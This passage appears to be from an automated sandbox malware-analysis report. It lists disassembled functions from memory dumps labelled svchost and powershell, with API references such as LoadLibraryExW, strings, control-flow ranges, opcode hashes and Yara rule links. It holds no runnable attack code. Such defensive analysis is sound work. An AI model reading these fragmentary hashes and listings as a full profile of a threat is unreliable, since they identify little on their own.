                                      • Instruction ID: 66bd6867b88826b1b95dfa9d2ffa6d0f737279d13ab6826bb27aa332bf879093
                                      • Opcode Fuzzy Hash: 1f9bf732db030eab792c3d8e2b9f28b5dd4216ae02c00d36d35bb9ab03fa372f
                                      • Instruction Fuzzy Hash: 5F312F70E0410AABDF04CF95C980ABFB7B5FF98304F10846AE515EB292E734AE51DB95
                                      Function 00404AF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON
                                      Download Yara Rule
                                      APIs
                                      • std::_Xinvalid_argument.LIBCPMT ref: 00404B09
                                        • Part of subcall function 00414103: std::exception::exception.LIBCMT ref: 00414118
                                        • Part of subcall function 00414103: __CxxThrowException@8.LIBCMT ref: 0041412D
                                        • Part of subcall function 00414103: std::exception::exception.LIBCMT ref: 0041413E
                                      • _memmove.LIBCMT ref: 00404B88
                                      Strings
                                      • invalid string position, xrefs: 00404B04
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                      • String ID: invalid string position
                                      • API String ID: 1785806476-1799206989
                                      • Opcode ID: 4f688eb7b139980606b6249c5054c7ec464165af03321488a7c1d0b7f26760dd
                                      • Instruction ID: c0dfb9ad1d84408aca3c0bc4771f70511c2b5052637a80a5b2d9d5061a7f9e99
                                      • Opcode Fuzzy Hash: 4f688eb7b139980606b6249c5054c7ec464165af03321488a7c1d0b7f26760dd
                                      • Instruction Fuzzy Hash: D23199B4D0021ADFCB08DF98C5809AEBBB1FF89304F108959E9256B385C734EA41CF95
                                      Function 004062F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: _strncmp
                                      • String ID: 5$EOS
                                      • API String ID: 909875538-1935795245
                                      • Opcode ID: 5d19d25491994af5a54c3fabd4302859563863366bd15e4f2d1bcdf2a326ec21
                                      • Instruction ID: cbb266d7676478089d8eb310e371b3e9da3167fd0b533db38114e6f4d1a4e4ac
                                      • Opcode Fuzzy Hash: 5d19d25491994af5a54c3fabd4302859563863366bd15e4f2d1bcdf2a326ec21
                                      • Instruction Fuzzy Hash: F001C471940308BBDB00DB75DC42BEA7364AB09704F408039F8027B1C2E678D61596A9
                                      Function 00415FF7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004147AA: __getptd.LIBCMT ref: 004147B0
                                        • Part of subcall function 004147AA: __getptd.LIBCMT ref: 004147C0
                                      • __getptd.LIBCMT ref: 00416006
                                        • Part of subcall function 00410540: __getptd_noexit.LIBCMT ref: 00410543
                                        • Part of subcall function 00410540: __amsg_exit.LIBCMT ref: 00410550
                                      • __getptd.LIBCMT ref: 00416014
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                      • String ID: csm
                                      • API String ID: 803148776-1018135373
                                      • Opcode ID: 7bb9c1e30fbc5ae72e6ed50af7ca16e765d77639bd1419dbdef8fde2e0cfdfc7
                                      • Instruction ID: de1ba10ac35249198c25df3b2f6096fc92783805510d7df63b2757107bfbf943
                                      • Opcode Fuzzy Hash: 7bb9c1e30fbc5ae72e6ed50af7ca16e765d77639bd1419dbdef8fde2e0cfdfc7
                                      • Instruction Fuzzy Hash: 9C014B34800305DACF34EF25C4446EEBBB6AF18311F25442FE445A6292DB3EC9C4CB59

                                      Executed Functions

                                      Function 00007FFD9BAAB1C8 Relevance: 1.7, APIs: 1, Instructions: 226COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 120 7ffd9baab1c8-7ffd9baab1d9 123 7ffd9baab1db-7ffd9baab244 120->123 131 7ffd9baab246-7ffd9baab2aa 123->131 139 7ffd9baab2ac-7ffd9baab2b3 131->139 140 7ffd9baab304-7ffd9baab9af 131->140 139->140 146 7ffd9baab9b9-7ffd9baab9eb LoadLibraryExW 140->146 147 7ffd9baab9b1-7ffd9baab9b6 140->147 148 7ffd9baab9ed 146->148 149 7ffd9baab9f3-7ffd9baaba1a 146->149 147->146 148->149
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.1958771929.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_23_2_7ffd9baa0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 98d3d4252d55945473a73558d26b83cd3f44ca49d928ef69bbff03ff0ea558ed
                                      • Instruction ID: cf8530f275dff77fd197c025996596a914ae3810e97d30cd900aad8e8f96e1b6
                                      • Opcode Fuzzy Hash: 98d3d4252d55945473a73558d26b83cd3f44ca49d928ef69bbff03ff0ea558ed
                                      • Instruction Fuzzy Hash: 4C616B72B0FBC94FEB258B98586526C7FA2EF55360F4401BFD088D71E7E914A90A8391
                                      Function 00007FFD9BAAB2F8 Relevance: 1.6, APIs: 1, Instructions: 132libraryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 151 7ffd9baab2f8-7ffd9baab9af 159 7ffd9baab9b9-7ffd9baab9eb LoadLibraryExW 151->159 160 7ffd9baab9b1-7ffd9baab9b6 151->160 161 7ffd9baab9ed 159->161 162 7ffd9baab9f3-7ffd9baaba1a 159->162 160->159 161->162
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.1958771929.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_23_2_7ffd9baa0000_powershell.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: 33a89e176c551d3a3cb880bb62557608216878fe0d6a3d7c6f3f05fa235895c8
                                      • Instruction ID: 2a03d9e2f2bf6db7f4f0719cc5b048dcb568bc6d997bc86c9bd1130fb14300f7
                                      • Opcode Fuzzy Hash: 33a89e176c551d3a3cb880bb62557608216878fe0d6a3d7c6f3f05fa235895c8
                                      • Instruction Fuzzy Hash: FD415831A0DB8C8FDB19DB9C98456B9BBE1FF55320F00427FD049C32A2DB60A805C791
                                      Function 00007FFD9BAAB934 Relevance: 1.6, APIs: 1, Instructions: 117libraryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 164 7ffd9baab934-7ffd9baab93b 165 7ffd9baab946-7ffd9baab9af 164->165 166 7ffd9baab93d-7ffd9baab945 164->166 169 7ffd9baab9b9-7ffd9baab9eb LoadLibraryExW 165->169 170 7ffd9baab9b1-7ffd9baab9b6 165->170 166->165 171 7ffd9baab9ed 169->171 172 7ffd9baab9f3-7ffd9baaba1a 169->172 170->169 171->172
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.1958771929.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_23_2_7ffd9baa0000_powershell.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: 1a1f7b90dca4f06075fbb484bfdcae0573820bd8ce57ee0daceb47e20aeb7bc9
                                      • Instruction ID: 6d9d59e6ae486cb544ef025cdffcf67032f67a2bfd2cb067103f64fb25a1e3d4
                                      • Opcode Fuzzy Hash: 1a1f7b90dca4f06075fbb484bfdcae0573820bd8ce57ee0daceb47e20aeb7bc9
                                      • Instruction Fuzzy Hash: B731E43190CB5C8FDB59DB988889BE9BBE1FF56320F04436BD049C3292DB74A805CB91